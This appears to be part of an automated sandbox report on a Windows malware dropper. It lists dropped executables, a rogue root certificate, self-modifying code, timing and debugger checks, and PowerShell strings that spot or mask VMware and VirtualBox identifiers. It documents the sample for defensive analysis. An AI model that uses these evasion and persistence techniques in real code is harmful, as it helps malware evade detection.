Source: hrlA367.tmp.20.dr	Static PE information: section name: uuxeujz entropy: 7.629124904063967
Source: hrlAF3E.tmp.28.dr	Static PE information: section name: .rsrc entropy: 7.492461511063864
Source: hrlAF3E.tmp.28.dr	Static PE information: section name: rhxpypg entropy: 7.63278169353373
Source: hrlAF3E.tmp.28.dr	Static PE information: section name: xcmhltj entropy: 7.631443406476418
Source: hrlAF3E.tmp.28.dr	Static PE information: section name: hnrxhix entropy: 7.6346675642622985
Source: hrlAF3E.tmp.28.dr	Static PE information: section name: woslvkg entropy: 7.637402478191515
Source: hrlAF3E.tmp.28.dr	Static PE information: section name: eszpqhx entropy: 7.635747701568092
Source: hrlAF3E.tmp.28.dr	Static PE information: section name: orzkedv entropy: 7.636407908522585
Source: hrlAF3E.tmp.28.dr	Static PE information: section name: zwezcbc entropy: 7.625644621095766
Source: hrlAF3E.tmp.28.dr	Static PE information: section name: uuxeujz entropy: 7.629124904063967
Source: zvhcfa.exe.30.dr	Static PE information: section name: .rsrc entropy: 7.492461511063864
Source: zvhcfa.exe.30.dr	Static PE information: section name: rhxpypg entropy: 7.63278169353373
Source: zvhcfa.exe.30.dr	Static PE information: section name: xcmhltj entropy: 7.631443406476418
Source: zvhcfa.exe.30.dr	Static PE information: section name: hnrxhix entropy: 7.6346675642622985
Source: zvhcfa.exe.30.dr	Static PE information: section name: woslvkg entropy: 7.637402478191515
Source: zvhcfa.exe.30.dr	Static PE information: section name: eszpqhx entropy: 7.635747701568092
Source: zvhcfa.exe.30.dr	Static PE information: section name: orzkedv entropy: 7.636407908522585
Source: zvhcfa.exe.30.dr	Static PE information: section name: zwezcbc entropy: 7.625644621095766
Source: zvhcfa.exe.30.dr	Static PE information: section name: uuxeujz entropy: 7.629124904063967

Persistence and Installation Behavior

Creates files in the system32 config directory

Source: C:\Windows\System32\lsass.exe	File created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Credentials\DFBE70A7E5CC19A398EBF1B96859CE5D	Jump to behavior
Source: C:\Windows\System32\lsass.exe	File created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Credentials\DFBE70A7E5CC19A398EBF1B96859CE5D	Jump to behavior
Source: C:\Windows\System32\lsass.exe	File created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Credentials\DFBE70A7E5CC19A398EBF1B96859CE5D	Jump to behavior
Source: C:\Windows\System32\lsass.exe	File created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Credentials\DFBE70A7E5CC19A398EBF1B96859CE5D	Jump to behavior
Source: C:\Windows\System32\lsass.exe	File created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Credentials\DFBE70A7E5CC19A398EBF1B96859CE5D	Jump to behavior

Drops executables to the windows directory (C:\Windows) and starts them

Source: unknown

Executable created and started: C:\Windows\SysWOW64\zvhcfa.exe

Installs new ROOT certificates

Source: C:\Windows\System32\lsass.exe	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob			Jump to behavior
Source: C:\Windows\System32\lsass.exe	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob			Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	File created: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Jump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exe	File created: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Jump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exe	File created: C:\Users\user\AppData\Local\Temp\hrlAF3E.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\hrlAF3E.tmp	File created: C:\Users\user\AppData\Local\Temp\SOFTWARE.LOG (copy)	Jump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exe	File created: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Jump to dropped file
Source: C:\Windows\System32\loaddll32.exe	File created: C:\Users\user\AppData\Local\Temp\hrlBAE7.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\hrlAF3E.tmp	File created: C:\Windows\SysWOW64\zvhcfa.exe	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\hrlAF3E.tmp

File created: C:\Windows\SysWOW64\zvhcfa.exe

Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\hrlAF3E.tmp

30_2_00402B40

Source: C:\Windows\System32\lsass.exe

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrlAF3E.tmp	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrlAF3E.tmp	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrlAF3E.tmp	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\zvhcfa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\zvhcfa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\zvhcfa.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Contains functionality to detect sleep reduction / modifications

Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Code function: 6_2_0047A139	6_2_0047A139
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Code function: 6_2_006F4178	6_2_006F4178
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Code function: 21_2_00624178	21_2_00624178

Found evasive API chain (may stop execution after checking mutex)

Source: C:\Users\user\AppData\Local\Temp\hrlAF3E.tmp	Evasive API call chain: CreateMutex,DecisionNodes,ExitProcess
Source: C:\Windows\SysWOW64\rundll32.exe	Evasive API call chain: CreateMutex,DecisionNodes,ExitProcess	graph_3-214
Source: C:\Windows\System32\loaddll32.exe	Evasive API call chain: CreateMutex,DecisionNodes,ExitProcess	graph_0-214

Found evasive API chain (may stop execution after checking volume information)

Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Evasive API call chain: GetVolumeInformation,DecisionNodes,Sleep	graph_7-13632
Source: C:\Windows\SysWOW64\zvhcfa.exe	Evasive API call chain: GetVolumeInformation,DecisionNodes,Sleep
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Evasive API call chain: GetVolumeInformation,DecisionNodes,Sleep	graph_6-12314
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Evasive API call chain: GetVolumeInformation,DecisionNodes,Sleep	graph_21-12172

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Special instruction interceptor: First address: 482DD0 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Special instruction interceptor: First address: 47D1FB instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Special instruction interceptor: First address: 4764A5 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Special instruction interceptor: First address: 428877 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Special instruction interceptor: First address: 4221E4 instructions caused by: Self-modifying code
Source: C:\Windows\SysWOW64\zvhcfa.exe	Special instruction interceptor: First address: 482DD0 instructions caused by: Self-modifying code
Source: C:\Windows\SysWOW64\zvhcfa.exe	Special instruction interceptor: First address: 47D1FB instructions caused by: Self-modifying code

Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp

Code function: 6_2_004763EE rdtsc

6_2_004763EE

Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep			graph_7-14541
Source: C:\Windows\SysWOW64\zvhcfa.exe	Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep

Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	API coverage: 6.7 %
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	API coverage: 8.1 %
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	API coverage: 8.6 %
Source: C:\Windows\SysWOW64\zvhcfa.exe	API coverage: 5.4 %

Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Code function: 21_2_00624178		21_2_00624178
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Code function: 6_2_006F4178		6_2_006F4178

Source: C:\Windows\System32\svchost.exe

File opened: PhysicalDrive0

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_10001677 WaitForSingleObject,wsprintfW,lstrcpyW,lstrcpyW,lstrcpyW,lstrcpyW,PathAppendW,PathAppendW,FindFirstFileW,lstrcpyW,lstrcmpiW,lstrcmpiW,lstrcmpiW,WaitForSingleObject,lstrcpyW,PathAppendW,FindClose,PathFindExtensionW,lstrcmpiW,lstrcpyW,PathAppendW,GetFileAttributesW,CopyFileW,SetFileAttributesW,lstrcmpiW,lstrcmpiW,lstrcpyW,PathAppendW,WaitForSingleObject,FindNextFileW,		0_2_10001677
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_10001677 WaitForSingleObject,wsprintfW,lstrcpyW,lstrcpyW,lstrcpyW,lstrcpyW,PathAppendW,PathAppendW,FindFirstFileW,lstrcpyW,lstrcmpiW,lstrcmpiW,lstrcmpiW,WaitForSingleObject,lstrcpyW,PathAppendW,FindClose,PathFindExtensionW,lstrcmpiW,lstrcpyW,PathAppendW,GetFileAttributesW,CopyFileW,SetFileAttributesW,lstrcmpiW,lstrcmpiW,lstrcpyW,PathAppendW,WaitForSingleObject,FindNextFileW,		3_2_10001677

Source: Microsoft-Windows-Partition%4Diagnostic.evtx.25.dr	Binary or memory string: VMwareVirtual disk2.06000c29ca78922693ae6540a85b54b51PCI Slot 32 : Bus 2 : Device 0 : Function 0 : Adapter 0 : Port 0 : Target 0 : LUN 0PCI\VEN_1000&DEV_0054&SUBSYS_197615AD&REV_01\3&218e0f40&0&00
Source: svchost.exe, 00000019.00000002.2757622594.0000026F53E2B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000019.00000000.1541947592.0000026F53E2B000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: @Microsoft-Windows-Hyper-V-Hypervisor
Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.25.dr	Binary or memory string: nonicVMware Virtual disk 6000c29ca78922693ae6540a85b54b51
Source: svchost.exe, 00000019.00000000.1542081602.0000026F53E43000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: (@vmci
Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.25.dr	Binary or memory string: VMware SATA CD00
Source: svchost.exe, 00000017.00000002.2760959586.000002938A82B000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: zSCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000_0r
Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.25.dr	Binary or memory string: NECVMWarVMware SATA CD00
Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.25.dr	Binary or memory string: LSI_SASVMware Virtual disk 6000c2942fce4d06663969f532e45d1a
Source: svchost.exe, 0000000D.00000002.2760164410.0000013A22413000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000D.00000000.1499277820.0000013A22413000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Microsoft-Windows-Storsvc%4Diagnostic.evtx.25.dr	Binary or memory string: VMware Virtual disk 2.0 6000c29ca78922693ae6540a85b54b51PCI\VEN_1000&DEV_0054&SUBSYS_197615AD&REV_01\3&218E0F40&0&00NTFS
Source: Microsoft-Windows-Storsvc%4Diagnostic.evtx.25.dr	Binary or memory string: VMware Virtual disk 2.0 6000c2942fce4d06663969f532e45d1aPCI\VEN_1000&DEV_0054&SUBSYS_197615AD&REV_01\3&218E0F40&0&00NTFS
Source: Microsoft-Windows-StorageSpaces-Driver%4Operational.evtx.25.dr	Binary or memory string: VMwareVirtual disk6000c2942fce4d06663969f532e45d1ap
Source: svchost.exe, 00000019.00000000.1545950482.0000026F54800000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: $value = $pr.Value.replace("VBOX", $value).replace("VBox", $value).replace("VMWARE", $value).replace("VMware Virtual disk", $value).replace("VMware", $value).replace("HARDDISK", "WDC").replace("VIRTUAL_DISK", $value)
Source: svchost.exe, 0000000E.00000002.2755481906.0000014E2522A000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
Source: System.evtx.25.dr	Binary or memory string: VMCI: Using capabilities (0x1c).
Source: svchost.exe, 00000019.00000003.1548329679.0000026F56212000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: $value = $pr.Value.replace("VEN_80EE", $value).replace("VEN_15AD", $value).replace("VBOX", $value).replace("VBox", $value).replace("VMWARE", $value).replace("82801FB", $value).replace("82441FX", $value).replace("82371SB", $value).replace("OpenHCD", $value).replace("VMWare", $value).replace("VMware", $value)
Source: svchost.exe, 0000000A.00000000.1495785024.000001A31C039000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: vmicshutdown
Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.25.dr	Binary or memory string: nonicNECVMWarVMware SATA CD00
Source: Microsoft-Windows-StorageSpaces-Driver%4Operational.evtx.25.dr	Binary or memory string: VMwareVirtual disk6000c2942fce4d06663969f532e45d1a@
Source: svchost.exe, 0000000A.00000000.1495275011.000001A31BA33000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: vmicvss
Source: svchost.exe, 0000000A.00000000.1495275011.000001A31BA33000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: $@vmicshutdown
Source: Microsoft-Windows-Ntfs%4Operational.evtx.25.dr	Binary or memory string: VMware
Source: svchost.exe, 00000019.00000000.1545950482.0000026F54800000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: if(($pr.Name -eq "Caption" -or $pr.Name -eq "Name" -or $pr.Name -eq "PNPDeviceID" -or $pr.Name -eq "AdapterCompatibility" -or $pr.Name -eq "Description" -or $pr.Name -eq "InfSection" -or $pr.Name -eq "VideoProcessor") -and ($pr.Value -match 'VBOX' -or $pr.Value -match 'VBox' -or $pr.Value -match 'VMWARE' -or $pr.Value -match 'VirtualBox' -or $pr.Value -match 'VMware' -or $pr.Value -match 'Oracle Corporation' -or $pr.Value -match 'Microsoft Basic Display Adapter'))
Source: svchost.exe, 0000000A.00000000.1495275011.000001A31BA33000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: @vmicshutdown
Source: svchost.exe, 0000000A.00000000.1495785024.000001A31C039000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: vmicheartbeat
Source: svchost.exe, 00000019.00000003.1548329679.0000026F56212000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: if(($pr.Name -eq "DeviceId" -or $pr.Name -eq "Caption" -or $pr.Name -eq "Name" -or $pr.Name -eq "PNPDeviceID" -or $pr.Name -eq "Service" -or $pr.Name -eq "Description") -and ($pr.Value -match 'VEN_80EE' -or $pr.Value -match 'VEN_15AD' -or $pr.Value -match 'VBOX' -or $pr.Value -match 'VBox' -or $pr.Value -match 'VMWARE' -or $pr.Value -match 'VMWare' -or $pr.Value -match 'VMware' -or $pr.Value -match '82801FB' -or $pr.Value -match '82441FX' -or $pr.Value -match '82371SB' -or $pr.Value -match 'OpenHCD'))
Source: dwm.exe, 0000000F.00000002.2810768629.00000283DDE43000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&0000007R
Source: Microsoft-Windows-StorageSpaces-Driver%4Operational.evtx.25.dr	Binary or memory string: ~VMwareVirtual disk6000c29ca78922693ae6540a85b54b510
Source: lsass.exe, 00000009.00000002.2763076804.000002A290A88000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: pvmicvssNT SERVICE
Source: svchost.exe, 00000019.00000002.2767956318.0000026F545E0000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: ~VMwareVirtual disk6000c29ca78922693ae6540a85b54b51
Source: Microsoft-Windows-StorageSpaces-Driver%4Operational.evtx.25.dr	Binary or memory string: ~VMwareVirtual disk6000c29ca78922693ae6540a85b54b518
Source: Microsoft-Windows-StorageSpaces-Driver%4Operational.evtx.25.dr	Binary or memory string: VMwareVirtual disk6000c2942fce4d06663969f532e45d1a8
Source: Microsoft-Windows-Partition%4Diagnostic.evtx.25.dr	Binary or memory string: VMwareVirtual disk2.06000c2942fce4d06663969f532e45d1aPCI Slot 32 : Bus 2 : Device 0 : Function 0 : Adapter 0 : Port 0 : Target 0 : LUN 0PCI\VEN_1000&DEV_0054&SUBSYS_197615AD&REV_01\3&218e0f40&0&00
Source: svchost.exe, 0000000A.00000000.1495785024.000001A31C039000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: (@SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.25.dr	Binary or memory string: storahciNECVMWarVMware SATA CD00
Source: lsass.exe, 00000009.00000000.1492685260.000002A290A13000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.2759022710.000002A290A13000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2754634469.0000014E25213000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000E.00000000.1503607386.0000014E25213000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000011.00000000.1513280730.000001CBD862B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.2758675176.000001CBD862B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000013.00000002.2754448913.000001F2BCA2A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000013.00000000.1517041619.000001F2BCA2A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000017.00000002.2761779919.000002938A840000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000017.00000000.1525869537.000002938A840000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000019.00000002.2758414118.0000026F53E43000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: svchost.exe, 00000019.00000002.2773939093.0000026F547CB000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: vmci\|To
Source: lsass.exe, 00000009.00000002.2763076804.000002A290A88000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: pvmicshutdownNT SERVICE
Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.25.dr	Binary or memory string: LSI_SASVMware Virtual disk 6000c29ca78922693ae6540a85b54b51
Source: svchost.exe, 0000000D.00000000.1499381207.0000013A2242B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.2760977729.0000013A2242B000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWP
Source: svchost.exe, 0000000A.00000000.1495275011.000001A31BA33000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: $@vmicheartbeat
Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.25.dr	Binary or memory string: nonicVMware Virtual disk 6000c2942fce4d06663969f532e45d1a
Source: svchost.exe, 00000019.00000000.1545950482.0000026F54800000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: $value = $pr.Value.replace("VBOX", $value).replace("VBox", $value).replace("VMWARE", $value).replace("VMware", $value).replace("VirtualBox", $value).replace("Oracle Corporation", $value).replace("Microsoft Basic Display Adapter", $value)
Source: lsass.exe, 00000009.00000002.2779510912.000002A291385000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMWare
Source: svchost.exe, 00000026.00000000.1567433869.000002389CA02000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcUmRdpServiceDsSvcfhsvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionsvsvcStorSvcWwanSvcvmicvssDevQueryBrokerNgcSvcsysmainNetmanTabletInputServicePcaSvcDisplayEnhancementServiceIPxlatCfgSvcDeviceAssociationServiceNcbServiceEmbeddedModeSensorServicewlansvcCscServiceWPDBusEnumMixedRealityOpenXRSvc
Source: lsass.exe, 00000009.00000002.2763076804.000002A290A88000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: pvmicheartbeatNT SERVICE
Source: svchost.exe, 0000000E.00000002.2755481906.0000014E2522A000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000P
Source: svchost.exe, 00000019.00000000.1545950482.0000026F54800000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: if(($pr.Name -eq "DeviceId" -or $pr.Name -eq "Caption" -or $pr.Name -eq "Model" -or $pr.Name -eq "PNPDeviceID") -and ($pr.Value -match 'VBOX' -or $pr.Value -match 'VBox' -or $pr.Value -match 'VMWARE' -or $pr.Value -match 'VMware'))
Source: dwm.exe, 0000000F.00000002.2810768629.00000283DDE43000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: svchost.exe, 0000000A.00000000.1495275011.000001A31BA33000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: @vmicheartbeat

Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	API call chain: ExitProcess graph end node	graph_6-11817
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	API call chain: ExitProcess graph end node	graph_7-13109
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	API call chain: ExitProcess graph end node	graph_21-11782
Source: C:\Users\user\AppData\Local\Temp\hrlAF3E.tmp	API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\hrlAF3E.tmp	API call chain: ExitProcess graph end node

Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\System32\svchost.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp

Code function: 6_2_004763EE rdtsc

6_2_004763EE

Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp

Code function: 6_2_7FE35AC1 LdrInitializeThunk,

6_2_7FE35AC1

Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp

Code function: 6_2_00402430 FindResourceA,LoadLibraryA,GetProcAddress,LoadResource,LockResource,CreateFileA,WriteFile,CloseHandle,

6_2_00402430

Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Code function: 6_2_0047619E mov edx, dword ptr fs:[00000030h]	6_2_0047619E
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Code function: 6_2_004765B3 mov eax, dword ptr fs:[00000030h]	6_2_004765B3
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Code function: 6_2_004763EE mov eax, dword ptr fs:[00000030h]	6_2_004763EE
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Code function: 6_2_0042887F mov edx, dword ptr fs:[00000030h]	6_2_0042887F
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Code function: 6_2_004369D9 mov edx, dword ptr fs:[00000030h]	6_2_004369D9
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Code function: 6_2_0041A736 mov edx, dword ptr fs:[00000030h]	6_2_0041A736
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Code function: 6_2_006F042D mov eax, dword ptr fs:[00000030h]	6_2_006F042D
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Code function: 6_2_006F05F2 mov eax, dword ptr fs:[00000030h]	6_2_006F05F2
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Code function: 6_2_006F025E mov edx, dword ptr fs:[00000030h]	6_2_006F025E
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Code function: 6_2_7FE30601 mov eax, dword ptr fs:[00000030h]	6_2_7FE30601
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Code function: 6_2_7FE30442 mov eax, dword ptr fs:[00000030h]	6_2_7FE30442
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Code function: 7_2_0047D14A mov eax, dword ptr fs:[00000030h]	7_2_0047D14A
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Code function: 7_2_0047D309 mov eax, dword ptr fs:[00000030h]	7_2_0047D309
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Code function: 7_2_0042887F mov edx, dword ptr fs:[00000030h]	7_2_0042887F
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Code function: 7_2_004369D9 mov edx, dword ptr fs:[00000030h]	7_2_004369D9
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Code function: 7_2_0041A736 mov edx, dword ptr fs:[00000030h]	7_2_0041A736
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Code function: 7_2_009B0442 mov eax, dword ptr fs:[00000030h]	7_2_009B0442
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Code function: 7_2_009B0601 mov eax, dword ptr fs:[00000030h]	7_2_009B0601
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Code function: 7_2_7FE30601 mov eax, dword ptr fs:[00000030h]	7_2_7FE30601
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Code function: 7_2_7FE30442 mov eax, dword ptr fs:[00000030h]	7_2_7FE30442
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Code function: 21_2_0042887F mov edx, dword ptr fs:[00000030h]	21_2_0042887F
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Code function: 21_2_0042212D mov eax, dword ptr fs:[00000030h]	21_2_0042212D
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Code function: 21_2_004222F2 mov eax, dword ptr fs:[00000030h]	21_2_004222F2
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Code function: 21_2_004369D9 mov edx, dword ptr fs:[00000030h]	21_2_004369D9
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Code function: 21_2_0041A736 mov edx, dword ptr fs:[00000030h]	21_2_0041A736
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Code function: 21_2_0062042D mov eax, dword ptr fs:[00000030h]	21_2_0062042D
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Code function: 21_2_006205F2 mov eax, dword ptr fs:[00000030h]	21_2_006205F2
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Code function: 21_2_0062025E mov edx, dword ptr fs:[00000030h]	21_2_0062025E
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Code function: 21_2_7FE30601 mov eax, dword ptr fs:[00000030h]	21_2_7FE30601
